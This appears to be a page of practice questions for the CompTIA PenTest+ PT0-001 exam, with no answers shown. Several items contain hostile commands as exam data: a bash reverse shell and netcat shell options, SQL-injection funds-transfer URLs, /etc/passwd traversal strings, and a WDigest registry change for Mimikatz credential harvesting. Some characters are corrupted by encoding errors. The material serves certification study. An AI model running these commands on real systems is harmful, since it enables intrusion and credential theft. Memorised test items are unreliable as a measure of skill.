Is this exam completely free?

ExamCademy offers a free preview for every exam, covering around 20% of the total questions. Full access to all questions is available for free by signing up for an account. Optional supporters unlock AstroTutor (AI tutor) and advanced study modes.

Can I practice IT certification exams from Microsoft, AWS, or CompTIA?

Yes! ExamCademy supports a wide range of IT certification exams including Microsoft Azure, AWS Cloud Practitioner, and CompTIA A+ and Security+.

How accurate are the mock exams?

Our practice questions are community-created and moderator-reviewed to align with realistic exam objectives, style, and difficulty.

PT0-001 by CompTIA - Page 1 | ExamCademy

Mode Selection

Question 1

Question 2

Question 3

When performing compliance-based assessments, which of the following is the MOST important key consideration?

A Additional rate
B Company policy
C Impact tolerance
D Industry type

Question 4

A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?

A Port scan
B Service enumeration
C Live host identification
D Denial of service

Question 5

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5.
Which of the following commands will test if the VPN is available?

A fpipe.exe -1 8080 -r 80 100.170.60.5
B ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5
C nmap -sS -A -f 100.170.60.5
D nc 100.170.60.5 8080 /bin/sh

Question 6

A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.
Which of the following is the BEST explanation for what happened?

A The organization failed to disable Telnet.
B Nmap results contain a false positive for port 23.
C Port 22 was filtered.
D The service is running on a non-standard port.

Question 7

Which of the following has a direct and significant impact on the budget of the security assessment?

A Scoping
B Scheduling
C Compliance requirement
D Target risk

Question 8

After several attempts, an attacker was able to gain unauthorized access through a biometrics sensor using the attacker's actual fingerprint without exploitation.
Which of the following is the MOST likely explanation of what happened?

A The biometric device is tuned more toward false positives.
B The biometric device is configured more toward true negatives.
C The biometric device is set to fail closed.
D The biometric device duplicated a valid user's fingerprint.

Question 9

A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.
The tester runs the following command:
nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130
Which of the following BEST describes why multiple IP addresses are specified?

A The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets.
B The tester is trying to perform a more stealthy scan by including several bogus addresses.
C The scanning machine has several interfaces to balance the scan request across at the specified rate.
D A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.

Question 10

Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?

A https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe'גˆ’&amount=200
B https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200
C https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' גˆ’&amount=200
D https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount='AND 1=1 AND select username from testbank.custinfo where username like 'Joe' גˆ’&amount=200

Question 11

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the
BEST control to remediate the use of common dictionary terms?

A Expand the password length from seven to 14 characters.
B Implement password history restrictions.
C Configure password filters/
D Disable the accounts after five incorrect attempts.
E Decrease the password expiration window.

Question 12

A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.).

A -O
B -iL
C -sV
D -sS
E -oN
F -oX

Question 13

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?

A To remove the persistence
B To enable persistence
C To report persistence
D To check for persistence

Question 14

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd
Which of the following attack types is MOST likely to be the vulnerability?

A Directory traversal
B Cross-site scripting
C Remote file inclusion
D User enumeration

Question 15

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
✑ Code review
✑ Updates to firewall settings
Which of the following has occurred in this situation?

A Scope creep
B Post-mortem review
C Risk acceptance
D Threat prevention

Question 16

At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

A Enumeration of services
B OSINT gathering
C Port scanning
D Social engineering

Question 17

During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?

A Ettercap
B Tcpdump
C Responder
D Medusa

Question 18

Given the following:
http://example.com/download.php?id-.../.../.../etc/passwd
Which of the following BEST describes the above attack?

A Malicious file upload attack
B Redirect attack
C Directory traversal attack
D Insecure direct object reference attack

Question 19

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1
Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?

A nc -nlvp 443
B nc 10.2.4.6. 443
C nc -w3 10.2.4.6 443
D nc -e /bin/sh 10.2.4.6. 443

Question 20

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

A reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

Question 21

Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

A set rhost 192.168.1.10
B run autoroute -s 192.168.1.0/24
C db_nmap -iL /tmp/privatehosts.txt
D use auxiliary/server/socks4a

Question 22

A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

A Advanced persistent threat
B Script kiddie
C Hacktivist
D Organized crime

Question 23

Click the exhibit button.

Question 24

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A arpspoof
B nmap
C responder
D burpsuite

Question 25

A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)

A Identity and eliminate inline SQL statements from the code.
B Identify and eliminate dynamic SQL from stored procedures.
C Identify and sanitize all user inputs.
D Use a whitelist approach for SQL statements.
E Use a blacklist approach for SQL statements.
F Identify the source of malicious input and block the IP address.

Page 1 of 8 • Questions 1-25 of 196

1 2 3 4 5

→

Know a question that should be here? Contribute to this exam

DRAG DROP -
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented. Each password may be used only once.
Select and Place:

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

A Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
B Identify the issues that can be remediated most quickly and address them first.
C Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
D Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

A SNMP brute forcing
B ARP spoofing
C DNS cache poisoning
D SMTP relay

PT0-001Preview